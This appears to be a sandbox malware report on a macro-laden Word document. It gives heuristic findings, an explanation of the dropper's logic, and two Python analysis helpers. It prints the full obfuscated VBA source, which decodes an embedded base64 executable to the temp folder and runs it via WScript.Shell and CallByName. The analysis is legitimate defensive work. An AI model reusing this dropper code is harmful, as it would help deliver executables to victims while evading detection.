MALICIOUS
Risk Score: 388
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document whose VBA project holds three modules: ThisDocument (with an AutoOpen macro), a standard module alnaschar, and a UserForm theta. AutoOpen is itself a decoy: it assigns Sin(21) to an Integer and compares it with 54 + 26 + 122 + 36323 = 36525, which can never match, so control always reaches the Else branch, and the line Enter = theta.Width there touches the predeclared UserForm. Reading any member of a UserForm loads its default instance, which fires theta.UserForm_Initialize, which calls alnaschar.disapprover. disapprover assembles "Scripting.FileSystemObject" from string fragments, resolves GetSpecialFolder(98 - 52 - 19 - 25) = GetSpecialFolder(2), the user's temporary folder, base64-decodes the contents of the form control theta.begrudge with the hand-written decoder coptic() (standard base64 with its masks and shifts split into arithmetic), writes the result to <temp>\sourdough.exe with Put #, and finally creates WScript.Shell and invokes CallByName(shell, "Run", 1, path), the literal 1 being VbMethod, so that no ".Run" appears in the source. Every other If/Select branch is dead code padded with dictionary words. The Heap-spray and NOP-sled findings are false positives produced by that same payload: the long runs of 0x41 are base64 'A' characters, which encode runs of zero bytes, here the zero padding of the embedded executable's MZ header; the bytes following the sled in the disassembly read as the base64 text of the DOS stub ("This program canno..."). The relevant behaviour is a macro dropper that writes and executes an embedded PE, not memory-corruption shellcode.
Heuristics (11)

- ClamAV: Ole2.Macro.Agent-9858864-1 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
- VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- WScript.Shell usage [critical] (OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:
  Dim aestas As Integer
  Set distraction = CreateObject("WScript.Shell")
  utopianism distraction, scintilla
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set distraction = CreateObject("WScript.Shell")
  (The macro also calls CreateObject("Scripting.FileSystemObject") in chaldron(), but the ProgID there is built from Right("broomScripti", 7) + Left("ng.FileSystemObjectdorm", 19) and does not appear as a literal.)
- CallByName call [high] (OLE_VBA_CALLBYNAME): CallByName call. Matched lines in script:
  adjectitious = 41 + 101 - 57 - 84
  bargeman = CallByName(dais, "Run", adjectitious, guineabissau)
  (41 + 101 - 57 - 84 evaluates to 1, the VbMethod call type, so this is WScript.Shell.Run with the dropped file path as its argument, invoked by name to keep ".Run" out of the source.)
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  Public Sub AutoOpen()
  Dim appalachia As Integer
  (AutoOpen's own body is a decoy; the real trigger is the reference to theta.Width in its Else branch, which instantiates the UserForm and runs UserForm_Initialize.)
- Heap-spray pattern detected [high] (SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found. Attempted x86 opcode disassembly:
  00017317 .. 00017376: 41 inc ecx (96 consecutive single-byte instructions)
  Caveat: 0x41 is ASCII 'A', and in base64 a run of 'A' characters encodes a run of zero bytes. This run lies about 0x2A0 bytes after the base64-encoded MZ header identified in the NOP-sled finding below, in the same stream, consistent with zero padding inside the embedded executable's headers. It is not a heap spray.
- Reference to Windows Script Host [high] (SC_STR_WSCRIPT): Reference to Windows Script Host
- NOP-equivalent sled detected [medium] (SC_NOP_EQUIV_SLED): Long run of 0x41 bytes. Attempted x86 opcode disassembly:
  0001703D .. 0001706B: 41 inc ecx (47 consecutive single-byte instructions)
  0001706C 7341 jae 0x170af
  0001706E 41 inc ecx
  0001706F 41 inc ecx
  00017070 41 inc ecx
  00017071 41 inc ecx
  00017072 3466 xor al, 0x66
  00017074 7567 jne 0x170dd
  00017076 3441 xor al, 0x41
  00017078 7441 je 0x170bb
  0001707A 6e outsb dx, byte ptr [esi]
  0001707B 4e dec esi
  0001707C 49 dec ecx
  0001707D 626742 bound esp, qword ptr [edi + 0x42]
  00017080 54 push esp
  00017081 4d dec ebp
  00017082 306856 xor byte ptr [eax + 0x56], ch
  00017085 47 inc edi
  00017086 6870637942 push 0x42796370
  0001708B 7763 ja 0x170f0
  0001708D 6d insd dword ptr es:[edi], dx
  0001708E 396e63 cmp dword ptr [esi + 0x63], ebp
  00017091 6d insd dword ptr es:[edi], dx
  00017092 46 inc esi
  00017093 7449 je 0x170de
  00017095 47 inc edi
  00017096 4e dec esi
  00017097 68626d3576 push 0x76356d62
  0001709C 64 .byte 0x64
  Caveat: read as ASCII rather than x86, the bytes from 0001706C onward are the text sAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vd. That is base64: "sAAAAA" decodes to the little-endian e_lfanew value 0xB0 at PE offset 0x3C, "4fug4AtAnNIbgBTM0h" to the standard DOS-stub code 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21, and "VGhpcyBwcm9ncmFtIGNhbm5vd" to "This program canno". The preceding 'A' run is the zero-filled remainder of the MZ header. The "sled" is the base64-encoded executable that coptic() decodes and disapprover() writes to sourdough.exe, not shellcode.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample the VBA project was in fact recovered (macros.bas, below), so here the marker only restates the AutoOpen finding.
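The two "sled" findings above are worth a reusable check, because the same false positive recurs on any macro that embeds a base64-encoded executable. The script below is an added example, not part of the analyzer's code. It decodes the 48 quad-aligned characters visible in the NOP-sled disassembly (PAGE_FRAGMENT) to show they are e_lfanew plus the DOS stub, and it scans macro text for base64 runs that decode to a PE, checking "MZ", the DOS-stub string at all three base64 alignments, and "PE\0\0" at e_lfanew. The sample input is constructed: a minimal MZ/DOS header with the standard stub and e_lfanew = 0xB0, wrapped in a made-up form property line (begrudge.Text) because the real control value is not on the page. Its base64 reproduces the 'A' run and the exact fragment the disassembler saw.

```python
"""Recognising a base64-encoded PE inside macro text.

Added example, not the analyzer's own code. In base64 every 3 zero bytes
become "AAAA", so the zero-padded MZ/DOS header of an embedded executable
looks to a shellcode scanner like a long run of 0x41 ("inc ecx") bytes.
"""
import base64
import binascii
import re
import struct

DOS_STUB = b"This program cannot be run in DOS mode"
# The bytes at 0001706C..0001709B in the NOP-sled disassembly above, read as
# ASCII rather than as x86 (48 characters = 12 base64 quads = 36 bytes).
PAGE_FRAGMENT = "sAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v"
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def b64_spellings(raw: bytes) -> list[str]:
    """Base64 encodes 3 bytes per 4 characters, so a byte string has three
    spellings depending on its offset mod 3. Return all three, trimmed to the
    characters that do not depend on neighbouring bytes, for use as markers."""
    spellings = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + raw).decode().rstrip("=")
        spellings.append(enc[4:-4])
    return spellings


def decode_fragment(fragment: str) -> dict:
    """Decode a quad-aligned fragment that begins at PE offset 0x3C (e_lfanew)."""
    raw = base64.b64decode(fragment)
    return {
        "e_lfanew": struct.unpack_from("<I", raw, 0)[0],
        "stub_code": raw[4:18].hex(),   # push cs / pop ds / mov dx / mov ah,9 / int 21h ...
        "stub_text": raw[18:].decode("ascii", "replace"),
    }


def find_base64_pe(text: str) -> list[dict]:
    """Find base64 runs in `text` that decode to a PE image: 'MZ' at offset 0,
    the DOS-stub string somewhere in the run, and 'PE\\0\\0' at e_lfanew."""
    markers = b64_spellings(DOS_STUB)
    hits = []
    for m in B64_RUN.finditer(text):
        run = m.group(0).rstrip("=")
        run = run[: len(run) - len(run) % 4]     # drop a trailing partial quad
        try:
            raw = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue
        if raw[:2] != b"MZ" or len(raw) < 0x40:
            continue
        e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
        hits.append({
            "offset": m.start(),
            "decoded_len": len(raw),
            "e_lfanew": e_lfanew,
            "stub_marker": any(s in run for s in markers),
            "pe_signature": raw[e_lfanew:e_lfanew + 4] == b"PE\x00\x00",
        })
    return hits


def build_sample_header(e_lfanew: int = 0xB0) -> bytes:
    """Constructed MZ/DOS header with the standard stub (not the dropped file);
    e_lfanew defaults to the 0xB0 that the page's fragment decodes to."""
    hdr = bytearray(e_lfanew + 4)
    hdr[0:4] = b"MZ\x90\x00"
    hdr[0x3C:0x40] = struct.pack("<I", e_lfanew)
    stub = bytes.fromhex("0e1fba0e00b409cd21b8014ccd21") + DOS_STUB + b".\r\r\n$"
    hdr[0x40:0x40 + len(stub)] = stub
    hdr[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    return bytes(hdr)


# Constructed stand-in for the UserForm control value theta.begrudge that the
# macro feeds to its base64 decoder; the property name is made up.
SAMPLE_VBA = (
    'Attribute VB_Name = "theta"\n'
    'begrudge.Text = "' + base64.b64encode(build_sample_header()).decode() + '"\n'
)

if __name__ == "__main__":
    print(decode_fragment(PAGE_FRAGMENT))
    print(find_base64_pe(SAMPLE_VBA))
```

Running the scan over the real macros.bas would not fire on the source itself, since the payload lives in the form's storage stream rather than the VBA text; point it at the control values olevba or oledump extract from the theta form, or at the raw OLE stream the disassembler was reading.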
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7795 bytes | 01d06a23541e40aee243c6230b8085fbe6e0297e4d4b04f8ab8d5d50da23af01 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FormatTablesIf()
Dim oTb As Table
For Each oTb In ActiveDocument.Tables
If oTb.Columns.Count < 5 Then
oTb.Style = "Light Shading - Accent 4"
oTb.Rows(1).Range.Style = ActiveDocument.Styles("Heading 2")
oTb.AutoFitBehavior (wdAutoFitFixed)
oTb.Rows.Alignment = wdAlignRowCenter
oTb.Columns.PreferredWidth = InchesToPoints(0.6)
Else
oTb.Style = "Medium List 2 - Accent 4"
oTb.Rows(1).Range.Style = ActiveDocument.Styles("Heading 4")
End If
Next oTb
End Sub
Public Sub AutoOpen()
Dim appalachia As Integer
Dim dabri As Variant
Dim re As Integer
Dim aigulet As Integer
re = Sin(21)
If re = 54 + 26 + 122 + 36323 Then
FormatTablesIf
Else
Dim aggrandize As Integer
Enter = theta.Width
session = 85
sauerbraten = 88
If session + sauerbraten < 46 Then
piercingly = Mid("graviscogust", 7, 2) + "nceitedly"
Else
sauerbraten = 48
End If
End If
End Sub
Sub FieldsCollectionObject()
Dim MyText As String
Dim MyRange As Object
Set MyRange = Selection.Range
MyText = "<Replace this with your text>"
End Sub
Attribute VB_Name = "alnaschar"
Public Sub autoimmune(ByRef abstemious, metaphorically, atticus)
Dim letup As Long
Dim inappreciable() As Byte
Dim unperceived As Byte
inappreciable = StrConv(metaphorically, vbFromUnicode)
Put #abstemious, , inappreciable
End Sub
Sub CheckSecLen()
Dim iSec As Integer
Dim oRng As Range
Dim iValue As Integer
With ActiveDocument
' go through each section (except for the last one)
For iSec = 1 To .Sections.Count - 1
' create a range object at the start of the section
Set oRng = .Sections(iSec).Range
oRng.Collapse wdCollapseStart
' insert a sectionpages field
.Fields.Add Range:=oRng, Type:=wdFieldSectionPages
' divide the sectionpages field by 2
' if it gives a zero as the remainder, then
' you have an even number of pages in the section,
' which is what you want with an odd section page break
If (.Sections(iSec).Range.Fields(1).Result Mod 2) <> 0 Then
' if you have an odd number of pages, then insert
' a page break before the section's section break
Set oRng = .Sections(iSec).Range
With oRng
.Collapse Direction:=wdCollapseEnd
.MoveEnd unit:=wdCharacter, Count:=-1
.InsertBreak Type:=wdPageBreak
End With
End If
' remove the sectionpages field that was added
.Sections(iSec).Range.Fields(1).Delete
Next iSec
End With
End Sub
Function coptic(assorted) As String
Dim disparity As String
Dim clipper As Long
Dim marrowbone As Integer
Dim finished As Long
Dim savara As Long
Dim fattened(63) As Long
Dim pinnace(63) As Long
Dim rerebrace() As Byte
Dim decomposition(63) As Long
Dim misconstrual(255) As Byte
Dim closest() As Byte
Dim presumable As Long
strictness = 113 + 16711567
sincere = 256
eriobotrya = 255
persuasibility = 126 - 68 + 65222
churlishness = 87 - 81 + 57
distrust = 258048
coluber = 262144
viola = 4032
dejection = 27 + 37
backbend = 91 - 76 + 4081
numero = 65536
dad = 18 - 63 + 16515117
clipper = Len(assorted)
If InStrRev(assorted, "==") Then
marrowbone = 2
ElseIf InStrRev(assorted, "=") Then
marrowbone = 1
End If
For clipper = 0 To 255
Select Case clipper
Case 65 To 90
misconstrual(clipper) = clipper - 65
Case 97 To 122
misconstrual(clipper) = clipper - 71
Case 48 To 57
misconstrual(clipper) = clipper + 4
Case 43
misconstrual(clipper) = 62
Case 47
misconstrual(clipper) = 63
End Select
Next clipper
For clipper = 0 To 63
fattened(clipper) = clipper * dejection
pinnace(clipper) = clipper * backbend
decomposition(clipper) = clipper * coluber
Next clipper
rerebrace = StrConv(assorted, vbFromUnicode)
ReDim closest((((UBound(rerebrace) + 1) \ 4) * 3) - 1)
For finished = 0 To UBound(rerebrace) Step 4
presumable = decomposition(misconstrual(rerebrace(finished))) + pinnace(misconstrual(rerebrace(finished + 1))) + _
fattened(misconstrual(rerebrace(finished + 2))) + misconstrual(rerebrace(finished + 3))
clipper = presumable And strictness
closest(savara) = clipper \ numero
clipper = presumable And persuasibility
closest(savara + 1) = clipper \ sincere
closest(savara + 2) = presumable And eriobotrya
savara = savara + 3
Next finished
disparity = StrConv(closest, vbUnicode)
If marrowbone Then disparity = Left$(disparity, Len(disparity) - marrowbone)
coptic = disparity
End Function
Sub disapprover()
Dim compatibility As Variant
buddhist = "cargador"
Dim longitudinally As String
Dim sadleria As Integer
Dim scintilla As String
established = 93
alamo = 79
If established + alamo < 51 Then
gink = "en" + Left("uredtammany", 4)
Else
alamo = 10
End If
longitudinally = chaldron
Dim bumptious As String
scintilla = longitudinally & "\sourdough.exe"
Dim rending As Byte
Dim oligocene
Dim cooperate
cooperate = FreeFile
Dim effects
effects = 0
Dim anabolism
Dim poolroom As Byte
oligocene = effects
Open scintilla For Binary Access Write As #cooperate
darkle = 78
boundshave = 92
If darkle + boundshave < 77 Then
obligated = StrReverse("an") + "val" + Lcase("") + Ucase("")
Else
boundshave = 85
End If
atheroma = theta.begrudge
Dim billowing As Byte
gammer = atheroma
dasymeter = coptic(gammer)
enshrine = Len(dasymeter)
oligocene = 1
Dim hirudo As Integer
Call alnaschar.autoimmune(cooperate, dasymeter, oligocene)
oligocene = oligocene + 6
honours = 51 - 49
Select Case honours
Case 1 To 7
meridian = Lcase("Te") + StrReverse("ress") + StrReverse("ea")
Case 8
meridian = "he" + Left("lminthfugacity", 6) + StrReverse("eugoga") + ""
Case 9
meridian = Mid("nelumbonaceaeasselowland", 14, 4) + Ucase("veRATI") + Lcase("ON")
End Select
Close #cooperate
For densely = 25 To 71
projectionist = Left("chtendency", 2) + Right("creweating", 6)
Next densely
Dim aestas As Integer
Set distraction = CreateObject("WScript.Shell")
utopianism distraction, scintilla
portfolio = 89
inuendo = 89
If portfolio + inuendo < 29 Then
thersites = "ic" + Lcase("tonYX")
Else
inuendo = 57
End If
End Sub
Sub utopianism(dais, guineabissau)
Dim hygrophytic As String
adjectitious = 41 + 101 - 57 - 84
bargeman = CallByName(dais, "Run", adjectitious, guineabissau)
For grapnel = 17 To 66
maxwell = Lcase("Cont") + "rollab" + Right("sphaerocarpalesle", 2) + ""
Next grapnel
End Sub
Function chaldron()
Dim literary As Long
Dim raze As Variant
its = Right("broomScripti", 7) + Left("ng.FileSystemObjectdorm", 19)
Dim firsthand As Integer
Set dismount = CreateObject(its)
horseson = 87
uncleanly = 75
If horseson + uncleanly < 39 Then
tick = "di" + "shra" + StrReverse("g")
Else
uncleanly = 82
End If
chaldron = dismount.GetSpecialFolder(98 - 52 - 19 - 25)
End Function
Attribute VB_Name = "theta"
Attribute VB_Base = "0{BED0B62E-9620-4845-97FE-244B0E3B715C}{324AC883-EAAB-4472-B475-EB00BD58F9AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
alnaschar.disapprover
End Sub
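The literals that matter in the macro above are never written out: the ProgID is glued together from Right/Left slices, the special-folder number and the CallByName call type are sums, and the base64 decoder coptic() hides its masks and shifts the same way. The following is an added example, not part of the extracted script or of the analyzer: it emulates the handful of VBA string built-ins the macro uses (1-based Mid, as in VBA), evaluates the expressions exactly as they appear in the source, and ports coptic() with its original arithmetic so that its output can be compared with Python's own base64 decoder. The only values of note not on the page are the meaning of GetSpecialFolder(2) (TemporaryFolder) and of CallByName call type 1 (VbMethod), which are Scripting Runtime and VBA constants.

```python
"""Resolving the obfuscated literals and the decoder in the extracted macro.

Added example, not the analyzer's code. VBA's Left/Right/Mid/StrReverse/
LCase and the split-up integer constants are emulated in Python so the
dropper's real strings can be read without opening the document.
"""
import base64


# VBA string built-ins (Mid is 1-based, as in VBA).
def Left(s: str, n: int) -> str: return s[:n]
def Right(s: str, n: int) -> str: return s[-n:] if n else ""
def Mid(s: str, start: int, length: int) -> str: return s[start - 1:start - 1 + length]
def StrReverse(s: str) -> str: return s[::-1]
def LCase(s: str) -> str: return s.lower()


def resolve_literals() -> dict:
    """The expressions exactly as they appear in the macro, evaluated."""
    return {
        # chaldron(): CreateObject(its)
        "its": Right("broomScripti", 7) + Left("ng.FileSystemObjectdorm", 19),
        # chaldron(): GetSpecialFolder(98 - 52 - 19 - 25); 2 is TemporaryFolder
        "special_folder": 98 - 52 - 19 - 25,
        # utopianism(): CallByName(dais, "Run", adjectitious, path); 1 is VbMethod
        "calltype": 41 + 101 - 57 - 84,
        # AutoOpen(): the guard Sin(21) is compared against (never equal)
        "autoopen_guard": 54 + 26 + 122 + 36323,
        # dead branches: string junk that is never reachable
        "piercingly": Mid("graviscogust", 7, 2) + "nceitedly",
        "meridian": LCase("Te") + StrReverse("ress") + StrReverse("ea"),
    }


def coptic(assorted: str) -> bytes:
    """Port of the macro's coptic() with the same arithmetic; the split
    constants are the ordinary base64 masks and shifts."""
    strictness = 113 + 16711567        # 0xFF0000
    persuasibility = 126 - 68 + 65222  # 0x00FF00
    eriobotrya = 255                   # 0x0000FF
    coluber = 262144                   # 1 << 18
    backbend = 91 - 76 + 4081          # 1 << 12
    dejection = 27 + 37                # 1 << 6
    numero, sincere = 65536, 256       # 1 << 16, 1 << 8
    # misconstrual(): alphabet table; anything else, including '=', stays 0
    table = {}
    for c in range(256):
        if 65 <= c <= 90:
            table[c] = c - 65
        elif 97 <= c <= 122:
            table[c] = c - 71
        elif 48 <= c <= 57:
            table[c] = c + 4
        elif c == 43:
            table[c] = 62
        elif c == 47:
            table[c] = 63
    # marrowbone: InStrRev(assorted, "==") / InStrRev(assorted, "=")
    pad = 2 if "==" in assorted else 1 if "=" in assorted else 0
    data = assorted.encode("latin-1")  # StrConv(assorted, vbFromUnicode)
    out = bytearray()
    for i in range(0, len(data), 4):   # For finished = 0 To UBound Step 4
        v = (coluber * table.get(data[i], 0)
             + backbend * table.get(data[i + 1], 0)
             + dejection * table.get(data[i + 2], 0)
             + table.get(data[i + 3], 0))
        out.append((v & strictness) // numero)
        out.append((v & persuasibility) // sincere)
        out.append(v & eriobotrya)
    return bytes(out[:len(out) - pad]) if pad else bytes(out)


def decodes_like_base64(sample: bytes) -> bool:
    """Round-trip check: the macro's decoder on standard base64 of `sample`
    must reproduce `sample` byte for byte."""
    return coptic(base64.b64encode(sample).decode()) == sample


if __name__ == "__main__":
    print(resolve_literals())
    print(coptic("TVqQAA=="))
```

The round-trip check is the quick way to decide whether a custom VBA decoder is plain base64 with renamed constants or a real variant (shuffled alphabet, XOR after decode); only the latter needs a bespoke decoder before the dropped file can be carved.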